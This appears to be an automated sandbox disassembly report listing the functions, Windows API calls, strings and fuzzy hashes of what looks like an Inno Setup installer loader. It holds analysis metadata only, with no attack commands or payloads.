memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 00409776
VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409781
VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 004097C2
VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 004097F4
VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409804

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: e7d59a0a1be65b1ec303da3268a7ff8597b9aef66cd3e2b8048c8a494adb3755
Instruction ID: 44c210a8e48c48985264e56f916c74eddf15e633ff85efca976292ba9331e058
Opcode Fuzzy Hash: e7d59a0a1be65b1ec303da3268a7ff8597b9aef66cd3e2b8048c8a494adb3755
Instruction Fuzzy Hash: 3F215E72210304ABD630AE598C85E9777DCDB45760F184D2EFA85F33C2D638EC448669

Uniqueness

Uniqueness Score: -1.00%

Function 004051D8 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040B4BC,00000001,?,004052A3,?,00000000,00405382), ref: 004051F6

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: cf18c32ad4b4180bbf3070ecb9de66825d20615657b4f7ee4738737295393d70
Instruction ID: c488385247b8728ccff325faa9690c1689411ec08dfc6ccb0026e5f0f67dc910
Opcode Fuzzy Hash: cf18c32ad4b4180bbf3070ecb9de66825d20615657b4f7ee4738737295393d70
Instruction Fuzzy Hash: 62E0927171021427D710A9A99C86AEB725CDBA8310F0042BFBA04E73C1EDB49E804AED

Uniqueness

Uniqueness Score: -1.00%

Function 004095BC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6CF47180.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004096D0,02057D44,004096C4,00000000,004096AC), ref: 00409630
CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004096D0,02057D44,004096C4,00000000), ref: 00409644
TranslateMessage.USER32(?), ref: 0040964C
DispatchMessageA.USER32 ref: 00409652
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00409660
MsgWaitForMultipleObjects.USER32 ref: 00409678
GetExitCodeProcess.KERNEL32 ref: 00409688
CloseHandle.KERNEL32(?,?,?,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000001,?,?,00000000), ref: 00409691

Part of subcall function 00409208: GetLastError.KERNEL32(00000000,004092AB,?,?,02057D44,?), ref: 0040922C

Strings

D, xrefs: 0040960A

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Message$CloseHandle$CodeDispatchErrorExitF47180LastMultipleObjectsPeekProcessTranslateWait
String ID: D
API String ID: 13735194-2746444292
Opcode ID: f8baab0b16f95bcb41a92faca313044c58b1755c98dcb2aabc14506fbbade818
Instruction ID: d858c4e90e296b6a0f27a38bb6cee8d1b41b96b06899fb1c418bc379a6a5f87c
Opcode Fuzzy Hash: f8baab0b16f95bcb41a92faca313044c58b1755c98dcb2aabc14506fbbade818
Instruction Fuzzy Hash: 862183B0A402087ADB10EBE6CC42F9F7BAC9F48714F51443BB714F62C2DA7D99058A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00409CF7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32 ref: 00409D53
SetWindowLongA.USER32 ref: 00409D6A

Part of subcall function 00406908: GetCommandLineA.KERNEL32(0040BDE0,?,00406A4C,00000000,00406A88,?,?,0040BDE0,?,00000000,00000000,?,00409345,00000000,004093D1), ref: 0040690C

Part of subcall function 004095BC: 6CF47180.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004096D0,02057D44,004096C4,00000000,004096AC), ref: 00409630
Part of subcall function 004095BC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,004096D0,02057D44,004096C4,00000000), ref: 00409644
Part of subcall function 004095BC: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00409660
Part of subcall function 004095BC: MsgWaitForMultipleObjects.USER32 ref: 00409678
Part of subcall function 004095BC: GetExitCodeProcess.KERNEL32 ref: 00409688
Part of subcall function 004095BC: CloseHandle.KERNEL32(?,?,?,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000001,?,?,00000000), ref: 00409691

RemoveDirectoryA.KERNEL32(00000000,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E50
72E69840.USER32(000902D6,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E64

Part of subcall function 004091A4: Sleep.KERNEL32(?,?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000), ref: 004091C3
Part of subcall function 004091A4: GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091E6
Part of subcall function 004091A4: GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091F0

Strings

STATIC, xrefs: 00409D4C
/SL4 $%x ", xrefs: 00409D89
InnoSetupLdrWindow, xrefs: 00409D47
" %d %d , xrefs: 00409DC9

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseErrorHandleLastWindow$CodeCommandCreateDirectoryE69840ExitF47180LineLongMessageMultipleObjectsPeekProcessRemoveSleepWait
String ID: " %d %d $/SL4 $%x "$InnoSetupLdrWindow$STATIC
API String ID: 3694042369-4098424104
Opcode ID: 4cd5e1fe10dc0eee086bfc375ea0fbbc4ea89b05899798eae4fd06476412d36a
Instruction ID: f219f7cac31ccee2f06799d6ad2095848454d82f650cf495ad7db1cb02fef157
Opcode Fuzzy Hash: 4cd5e1fe10dc0eee086bfc375ea0fbbc4ea89b05899798eae4fd06476412d36a
Instruction Fuzzy Hash: 72411B71A042059FD715EBA9ED45BAA77A8EB88304F20443BE200F73E2D77D9D448B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00408D48 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00408DE1,?,?,?,?,00000000,?,0040984F), ref: 00408D68
6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00408DE1,?,?,?,?,00000000,?,0040984F), ref: 00408D6E
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00408DE1,?,?,?,?,00000000,?,0040984F), ref: 00408D82
6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00408DE1,?,?,?,?,00000000,?,0040984F), ref: 00408D88

Strings

Wow64RevertWow64FsRedirection, xrefs: 00408D78
kernel32.dll, xrefs: 00408D63, 00408D7D
Wow64DisableWow64FsRedirection, xrefs: 00408D5E
shell32.dll, xrefs: 00408DB4

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: D5550HandleModule
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 920177481-2130885113
Opcode ID: 237ebf10833006d0dc0d2c52c6fb264561d27bb640f22c1f5f3b6ed9c4347ad9
Instruction ID: a29a6fcccb8c14819faacb4d8ba10ad4a88b1db07d2c391e7f95c455850d2a24
Opcode Fuzzy Hash: 237ebf10833006d0dc0d2c52c6fb264561d27bb640f22c1f5f3b6ed9c4347ad9
Instruction Fuzzy Hash: 4A01A770244340AEF7006B66DE0BB5A3658EBD5758F61453FF440B61C2CF7C6900A6BD

Uniqueness

Uniqueness Score: -1.00%

Function 00409A71 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 119
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32 ref: 00409ACB
MessageBoxA.USER32 ref: 00409B0F

Strings

,w@, xrefs: 00409BE7
Win32s, xrefs: 00409AB4
.tmp, xrefs: 00409B46
<r@, xrefs: 00409B98

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Message
String ID: ,w@$.tmp$<r@$Win32s
API String ID: 2030045667-2233101040
Opcode ID: ee98716ca81d67613fc363bd8aed8c31c5098f871ffe2c30284b4ee117b8a8d5
Instruction ID: 9b1785392df1a669e9b81b74d999d5f094ad276719e7aa1103bef36cba094786
Opcode Fuzzy Hash: ee98716ca81d67613fc363bd8aed8c31c5098f871ffe2c30284b4ee117b8a8d5
Instruction Fuzzy Hash: 1C418D706142449BD715EF65EE52AAA77A5EB48704F10843AF900B77E2CB7D6C00CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00409D0A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32 ref: 00409D53
SetWindowLongA.USER32 ref: 00409D6A
RemoveDirectoryA.KERNEL32(00000000,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E50
72E69840.USER32(000902D6,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00409E64

Strings

/SL4 $%x ", xrefs: 00409D89
" %d %d , xrefs: 00409DC9

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$CreateDirectoryE69840LongRemove
String ID: " %d %d $/SL4 $%x "
API String ID: 119257923-2863619551
Opcode ID: fac588007fba0bb9514b75f5b2563e1d7310f3a56d49c9a4e8b6fc88e862312c
Instruction ID: c60c828b4d65f793618b5bb2fef89c4a52c928935432fa832ecf54849e786056
Opcode Fuzzy Hash: fac588007fba0bb9514b75f5b2563e1d7310f3a56d49c9a4e8b6fc88e862312c
Instruction Fuzzy Hash: 93415B71A042059FCB01EBA9DD45BAEB7A4EF88304F14457BE200B73E2C77C99858B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.KERNEL32(0040B41C,00000000,00401AB4), ref: 00401A09
LocalFree.KERNEL32(00000000,00000000,00401AB4), ref: 00401A1B
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401AB4), ref: 00401A3A
LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401AB4), ref: 00401A79
RtlLeaveCriticalSection.KERNEL32(0040B41C,00401ABB), ref: 00401AA4
RtlDeleteCriticalSection.KERNEL32(0040B41C,00401ABB), ref: 00401AAE

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 6c76a69aab1a1f3df5ba2e12c30d7b7fa82e2f09a92a1617bef653e377a21f91
Instruction ID: b0c8d0c63b49c6aaabe66432ff64a941bd842da83dadee4e543dc85868b8677d
Opcode Fuzzy Hash: 6c76a69aab1a1f3df5ba2e12c30d7b7fa82e2f09a92a1617bef653e377a21f91
Instruction Fuzzy Hash: FD1130707823809ADB11ABA59EC6F523668D745B08F44447EF444BA3F3C77C9950CAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00403DA6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32 ref: 00403E41
ExitProcess.KERNEL32 ref: 00403E89

Strings

Runtime error at 00000000, xrefs: 00403E3A, 00403E4D
Error, xrefs: 00403E35

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000
API String ID: 1220098344-2970929446
Opcode ID: c79c1e547e07a3d1ac10d563cbf51c4eb115eb0186fe91d057b894d5a3940c77
Instruction ID: e959e555da05728f6c5869fbe468bed2cd35297cb525c612a59fe2bc640103ba
Opcode Fuzzy Hash: c79c1e547e07a3d1ac10d563cbf51c4eb115eb0186fe91d057b894d5a3940c77
Instruction Fuzzy Hash: 9F21C130A203454AD710AF299A457163E99DB89709F04817BE610BB3E3C73D8A49C7EE

Uniqueness

Uniqueness Score: -1.00%

Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitializeCriticalSection.KERNEL32(0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040192E
RtlEnterCriticalSection.KERNEL32(0040B41C,0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 00401941
LocalAlloc.KERNEL32(00000000,00000FF8,0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040196B
RtlLeaveCriticalSection.KERNEL32(0040B41C,004019D5,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 004019C8

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 62b43acc0c014e845e7ec1459505867db7c77a511b853e11806176e9f642a6df
Instruction ID: 1fbc517603835383e1336f1caa5f3efd636d2a280deaa4dd4e997cee02ce5fac
Opcode Fuzzy Hash: 62b43acc0c014e845e7ec1459505867db7c77a511b853e11806176e9f642a6df
Instruction Fuzzy Hash: 2B016DB0A843409EE715AB6A9A56B263AA4D785B04F1484BFF050FA3F3C77C4550C7DD

Uniqueness

Uniqueness Score: -1.00%

Function 00408FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,004090C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040901A
GetLastError.KERNEL32(00000000,00000000,?,00000000,004090C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409023

Strings

.tmp, xrefs: 00409003

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 1cea449666cdd0ed85d24bb2760ad0d574e486da7f0c2cbca6b096bfadc8e6bf
Instruction ID: 3220a296c2fa314433b07343a343c63327ff16af74aef59c18056ed8c3e7a7a5
Opcode Fuzzy Hash: 1cea449666cdd0ed85d24bb2760ad0d574e486da7f0c2cbca6b096bfadc8e6bf
Instruction Fuzzy Hash: C1210675A002089BDB01EBA5C9529DFB7B9EB48304F10457FE901B73C2DA7C9E059AA9

Uniqueness

Uniqueness Score: -1.00%

Function 004091A4 Relevance: 5.0, APIs: 4, Instructions: 45
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000), ref: 004091C3
Sleep.KERNEL32(?,?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000), ref: 004091D3
GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091E6
GetLastError.KERNEL32(?,?,?,0000000D,?,00409E3C,000000FA,00000032,00409EA3,000000FC,00409528,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004091F0

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 56aa7e75167a56a920e5b67f4a02156d664ad88dc0045ca53e1708c400c919b7
Instruction ID: 1baed0ea7b9165708bdd05216e8a8b0124bd17769a51bde77f6f9ef227ebea94
Opcode Fuzzy Hash: 56aa7e75167a56a920e5b67f4a02156d664ad88dc0045ca53e1708c400c919b7
Instruction Fuzzy Hash: 6CF09C7270521E67E620B57A5C8956F7258D9C1364711413BEA04FB292D538CC415369

Uniqueness

Uniqueness Score: -1.00%

Function 00407C20 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 134
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407D0E

Strings

-, xrefs: 00407CB1
LzmaDecoderInit failed (%d), xrefs: 00407D80

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: -$LzmaDecoderInit failed (%d)
API String ID: 4275171209-4285503710
Opcode ID: d2110b3af6429a55875fc7914625e4dc743a4f6743e9e24e16858dd4763aa917
Instruction ID: a48428d8d5412f9af56008512fb6c35eaa3a2c32f4c8ff32bf9af2dfcb8c22bf
Opcode Fuzzy Hash: d2110b3af6429a55875fc7914625e4dc743a4f6743e9e24e16858dd4763aa917
Instruction Fuzzy Hash: 6C514370E082499FEB00DFA9C4457AEBBB5EF45304F1480BAE504F72D2D778AD458B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401FD4 Relevance: 3.1, APIs: 2, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.KERNEL32(0040B41C,00000000,00402148), ref: 00402017

Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040192E
Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040B41C,0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 00401941
Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040B41C,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 0040196B
Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040B41C,004019D5,00000000,004019CE,?,?,0040217A,02051ED0,?,00000000,?,?,00401B95,00401BAA,00401CEE), ref: 004019C8

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
String ID:
API String ID: 296031713-0
Opcode ID: 2956ed08cba00207c91bedb70f797ce2ba9ba79a1d7e08a1effb931987ae65ce
Instruction ID: ed07ada503c9dfb2e1eb27cc502ea44feb9c5f3764cbaabb531550d88a14e1fb
Opcode Fuzzy Hash: 2956ed08cba00207c91bedb70f797ce2ba9ba79a1d7e08a1effb931987ae65ce
Instruction Fuzzy Hash: D641D1B2A40705DFDB10CF69DE8561A77A0FB58314B15827BD944B73E2D3789941CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 00408C60 Relevance: 3.0, APIs: 2, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

6CAD5F60.KERNEL32(00000000,00000000,00408CBD,?,0000000D,00000000), ref: 00408C97
GetLastError.KERNEL32(00000000,00000000,00408CBD,?,0000000D,00000000), ref: 00408C9F

Memory Dump Source

Source File: 00000001.00000002.376442774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.376435251.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376452921.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376464043.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.376471174.0000000000417000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 467da67866ddee734c22c825485f8c3ad707a3113f5d79c4c45c78662779c30e
Instruction ID: 50205cdb67d28fc191fb2c331cd0b23a95458e84667133931a3cee916848f83d
Opcode Fuzzy Hash: 467da67866ddee734c22c825485f8c3ad707a3113f5d79c4c45c78662779c30e
Instruction Fuzzy Hash: 2FF02230A09708ABEB00EFB59D418ADB3FCDB4931079149BFE914F3381EA384E1042B8

Uniqueness

Uniqueness Score: -1.00%

Function 00406DF4 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 00406DFE
